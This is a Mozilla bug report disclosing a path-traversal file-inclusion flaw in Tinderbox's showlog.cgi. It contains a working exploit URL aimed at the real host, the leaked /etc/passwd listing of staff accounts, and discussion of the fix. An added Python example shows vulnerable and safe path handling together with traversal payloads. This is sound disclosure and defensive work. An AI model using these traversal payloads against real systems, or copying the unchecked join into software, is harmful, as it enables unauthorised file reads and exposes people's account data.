Closed Bug 823923 Opened 12 years ago Closed 12 years ago

local file inclusion vulnerability in Tinderbox

Categories

(Webtools Graveyard :: Tinderbox, defect)

defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: curtisk, Assigned: mozilla)

References

Details

(Keywords: reporter-external)

Hello, my name is Fabián Cuchietti, I'm a security researcher. In this research I have found a Local File Inclusion (LFI). A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. I confirmed this issue by reading some files from the target web server. (IS BUG BOUNTY?)

URL: http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation cg-bugs01&fulltext=1
Parameter Name: logfile
Parameter Type: Querystring
Attack Pattern: ../../../../../../../../../../../etc/passwd

Response:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
nagios:x:101:102:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
bonsai:x:522:105::/home/bonsai:/bin/bash
tinderbox:x:521:104::/home/tinderbox:/bin/bash
varnish:x:103:107:Varnish http accelerator user:/var/lib/varnish:/sbin/nologin
nginx:x:104:108:Nginx user:/var/lib/nginx:/bin/false
hpsmh:x:400:400::/opt/hp/hpsmh:/sbin/nologin
_lldpd:x:105:109:LLDP daemon:/var/run/lldpd:/bin/false
infrasec:x:2324:2324::/home/infrasec:/bin/bash
dmoore:x:599:599::/home/dmoore:/bin/bash
bhourigan:x:1734:1734::/home/bhourigan:/bin/bash
arr:x:1556:1556::/home/arr:/bin/tcsh
rtucker:x:1509:1509::/home/rtucker:/bin/bash
rpina:x:1396:1396::/home/rpina:/bin/bash
mburns:x:1726:1726::/home/mburns:/bin/bash
justdave:x:504:504::/home/justdave:/bin/bash
mrz:x:506:506::/home/mrz:/bin/tcsh
gdestuynder:x:1663:1663::/home/gdestuynder:/bin/bash
shyam:x:1137:1137::/home/shyam:/bin/bash
jvier:x:1449:1449::/home/jvier:/bin/bash
jthomas:x:1700:1700::/home/jthomas:/bin/bash
jcrowe:x:1735:1735::/home/jcrowe:/bin/bash
mlarrain:x:1647:1647::/home/mlarrain:/bin/bash
rbryce:x:1736:1736::/home/rbryce:/bin/bash
pchiasson:x:1645:1645::/home/pchiasson:/bin/bash
tmary:x:1592:1592::/home/tmary:/bin/bash
dmitchell:x:1458:1458::/home/dmitchell:/bin/bash
ghuerta:x:1524:1524::/home/ghuerta:/bin/bash
oremj:x:505:505::/home/oremj:/bin/bash
mpressman:x:1595:1595::/home/mpressman:/bin/bash
nmaul:x:1549:1549::/home/nmaul:/bin/bash
mcoates:x:1306:1306::/home/mcoates:/bin/bash
scabral:x:1808:1808::/home/scabral:/bin/bash
ashish:x:1579:1579::/home/ashish:/bin/bash
amilewski:x:1177:1177::/home/amilewski:/bin/bash
eparker:x:1797:1797::/home/eparker:/bin/bash
ckolos:x:1732:1732::/home/ckolos:/bin/bash
jdow:x:1299:1299::/home/jdow:/bin/bash
cshields:x:1047:1047::/home/cshields:/bin/bash
dgherman:x:1562:1562::/home/dgherman:/bin/bash
jstevensen:x:1679:1679::/home/jstevensen:/bin/bash
jlazaro:x:1303:1303::/home/jlazaro:/bin/bash
rsoderberg:x:1432:1432::/home/rsoderberg:/bin/bash
petef:x:1519:1519::/home/petef:/bin/bash
jwatkins:x:1787:1787::/home/jwatkins:/bin/bash
cliang:x:1795:1795::/home/cliang:/bin/bash
ahill2:x:1541:1541::/home/ahill2:/bin/bash
rmilewski:x:1427:1427::/home/rmilewski:/bin/bash
dparsons:x:1724:1724::/home/dparsons:/bin/bash
bkero:x:1369:1369::/home/bkero:/bin/bash
rhelmer:x:1476:1476::/home/rhelmer:/bin/bash
lthomson:x:5506:5506::/home/lthomson:/bin/bash
afernandez:x:1905:1905::/home/afernandez:/bin/bash
cransom:x:1835:1835::/home/cransom:/bin/bash
jhayashi:x:1848:1848::/home/jhayashi:/bin/bash
bobm:x:1925:1925::/home/bobm:/bin/bash
mmayo:x:1788:1788::/home/mmayo:/bin/bash
bburton:x:1868:1868::/home/bburton:/bin/bash
cturra:x:1909:1909::/home/cturra:/bin/bash
dmaher:x:1924:1924::/home/dmaher:/bin/bash
amckay:x:1217:1217::/home/amckay:/bin/bash
eziegenhorn:x:1892:1892::/home/eziegenhorn:/bin/bash
ayounsi:x:1155:1155::/home/ayounsi:/bin/bash
mhenry:x:1927:1927::/home/mhenry:/bin/bash
juber:x:1959:1959::/home/juber:/bin/bash
ossec:x:401:401::/var/ossec:/sbin/nologin
ossecm:x:402:401::/var/ossec:/sbin/nologin
ossecr:x:403:401::/var/ossec:/sbin/nologin

Best regards, Fabián Cuchietti.
Flags: sec-bounty?
The showlog.cgi file is located here: https://mxr.mozilla.org/mozilla/source/webtools/tinderbox/showlog.cgi Someone else will have to audit the code since I'm not that good at Perl.
You still have not corrected the vulnerability?
reed: Who is the appropriate assignee for this bug?
Flags: needinfo?(reed)
I'll take it.
Assignee: nobody → reed
Flags: needinfo?(reed)
If we're not going to fix it can we just shut tinderbox down? What hasn't migrated to tbpl?
Flags: sec-bounty? → sec-bounty+
http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, root@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.
Apache Server at tinderbox.mozilla.org Port 80
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
(In reply to Michael Henry [:tinfoil] from comment #7)
> http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation

Where's the patch that fixed this? Apparently, it was done in bug 842742, which I can't see. Why was a separate bug filed? Work should have been done in this bug. We don't do separate super-hidden bugs for normal security fixes, so why in the world would we do the same here?

The fix, which while it may work, is definitely not the best way to do this:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&root=/cvsroot&subdir=mozilla/webtools/tinderbox&command=DIFF_FRAMESET&root=/cvsroot&file=showlog.cgi&rev1=1.35&rev2=1.36

Has anybody tried using hex codes for '.' and seeing if it still works (or some other form of obfuscation of the '.')?
Assignee: reed → aki
If you mean .. , f/e, that doesn't work.
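The report above (a `logfile` parameter joined straight onto the log directory) and reed's question about hex-encoded dots both come down to where the check is made. The following is an added example, not Tinderbox's own showlog.cgi (which is Perl) and not the 1.35 to 1.36 change, whose contents are not visible on this page. It assumes a hypothetical layout of one log directory with a file outside it, and shows three things side by side: the unchecked join that reproduces the reported traversal, a string filter for '..' applied to the still-encoded parameter (one plausible weak fix, invented here for contrast), and a check that decodes the value, resolves the final path and requires it to stay under the log directory, so that it does not depend on recognising any particular spelling of '.'.

```python
"""Added example: confining a showlog-style ``logfile`` parameter.

Illustration code, not Tinderbox's showlog.cgi. The directory layout,
payloads and function names are assumptions made for the example.
"""
import os
import tempfile
from urllib.parse import unquote


def vulnerable_open(base_dir: str, logfile: str) -> str:
    """Mirrors the reported bug: the query parameter is joined onto the
    log directory unchecked, so '../etc/passwd'-style values escape it."""
    path = os.path.join(base_dir, logfile)
    with open(path) as fh:
        return fh.read()


def naive_filter(logfile: str) -> bool:
    """Hypothetical weak fix: reject a literal '..' in the raw parameter.

    If this runs before percent-decoding (or on a copy that is decoded
    again later), '%2e%2e' contains no '..' and is allowed through.
    Returns True when the value would be accepted."""
    return ".." not in logfile


def safe_log_path(base_dir: str, logfile: str):
    """Return the resolved path if it stays inside base_dir, else None.

    Decode first, then let realpath collapse '..' and symlinks, and
    compare the result against the resolved base directory. Because the
    decision is made on the final filesystem path, encoded dots, extra
    slashes and absolute paths are all handled by the same comparison.
    """
    decoded = unquote(logfile)
    if "\x00" in decoded:            # NUL bytes never belong in a log name
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when 'decoded' is absolute; the
    # commonpath check below catches that case as well.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> dict:
    """Build a throwaway tree (constructed data): logs/build.log inside the
    log directory and a 'secret' file one level above it, then run the
    traversal payloads through each function."""
    root = tempfile.mkdtemp()
    logs = os.path.join(root, "logs")
    os.mkdir(logs)
    with open(os.path.join(logs, "build.log"), "w") as fh:
        fh.write("build ok\n")
    with open(os.path.join(root, "secret"), "w") as fh:
        fh.write("root:x:0:0\n")

    payloads = {
        "plain": "../secret",                   # what the report used
        "encoded": "%2e%2e/secret",             # reed's hex-coded dots
        "absolute": os.path.join(root, "secret"),
        "legit": "build.log",
    }
    results = {}
    for name, value in payloads.items():
        results[name] = {
            "naive_filter_allows": naive_filter(value),
            "safe_path": safe_log_path(logs, value),
        }
    # The unchecked join really does read the file outside the log dir.
    results["vulnerable_reads_secret"] = (
        vulnerable_open(logs, "../secret").strip() == "root:x:0:0"
    )
    return results


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, val)
```

The point reed raises is answered by the last column of the output rather than by the filter: a filter that inspects the text of the parameter has to anticipate every encoding the server or script might later undo, whereas comparing the resolved path against the resolved base directory is indifferent to how the dots were written.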
Group: webtools-security
Depends on: tinderbox-death
Product: Webtools → Webtools Graveyard